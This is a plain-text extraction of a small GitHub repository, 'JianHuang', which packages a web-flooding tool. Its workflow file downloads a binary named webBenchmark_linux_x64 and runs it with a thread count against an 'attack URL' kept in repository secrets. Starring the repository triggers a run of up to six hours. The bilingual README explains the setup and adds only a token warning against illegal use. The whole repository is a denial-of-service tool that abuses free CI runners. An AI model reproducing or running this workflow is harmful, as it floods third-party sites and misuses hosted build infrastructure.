Repository: lem0nb/jianhuang
Branch: master
Commit: d847659c196e
Files: 3
Total size: 1.1 KB
Directory structure:
gitextract_ege6f38d/
├── .github/
│ └── workflows/
│ └── jh.yml
├── README.md
└── webBenchmark_linux_x64
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/workflows/jh.yml
================================================
name: 'JianHuang'
on:
# push:
watch:
types: started
jobs:
Run:
runs-on: ubuntu-latest
steps:
- name: 'Ready'
run: |
wget https://github.com/lem0nb/jianhuang/raw/master/webBenchmark_linux_x64 -O jh
chmod +x jh
- name: 'Start JianHuang'
run: |
./jh -c ${{ secrets.XC }} -s ${{ secrets.URL }}
================================================
FILE: README.md
================================================
# JianHuang
English | [Zh-cn](#JianHuang-1)
GitHub action Jiang Huang (brush traffic) longest executable 6hour, support setting attack URL and thread
# Usage Method
Add Secrets
Name | Value
URL | attack URL
XC | Number of threads
Click star to start execution
# Troubleshooting
Q: What if you click star and do not execute it?
A: Edit.github/workflows/ jh.yml Add a space at the end and submit to save
# statement
Do not use for illegal purposes
.
.
.
.
.
.
# JianHuang
[English](#JianHuang) | Zh-cn
Github Action JianHuang
剑皇(刷流量) 最长可执行6HOUR
支持设定攻击URL和线程
# 使用方法
添加Secrets
Name | Value
URL | 攻击URL
XC | 线程数
点击STAR开始执行
# 疑难解答
Q:点击Star不执行怎么办?
A:编辑.github/workflows/jh.yml 在末尾随便添加空格 然后提交保存
………
# 声明
请勿用于非法用途
gitextract_ege6f38d/ ├── .github/ │ └── workflows/ │ └── jh.yml ├── README.md └── webBenchmark_linux_x64
Condensed preview — 3 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (1K chars).
[
{
"path": ".github/workflows/jh.yml",
"chars": 367,
"preview": "name: 'JianHuang' \non:\n# push: \n watch:\n types: started\njobs:\n Run:\n runs-on: ubuntu-latest\n steps:\n - "
},
{
"path": "README.md",
"chars": 774,
"preview": "# JianHuang\nEnglish | [Zh-cn](#JianHuang-1)\n\nGitHub action Jiang Huang (brush traffic) longest executable 6hour, support"
}
]
// ... and 1 more files (download for full content)
About this extraction
This page contains the full source code of the lem0nb/jianhuang GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 3 files (1.1 KB), approximately 487 tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.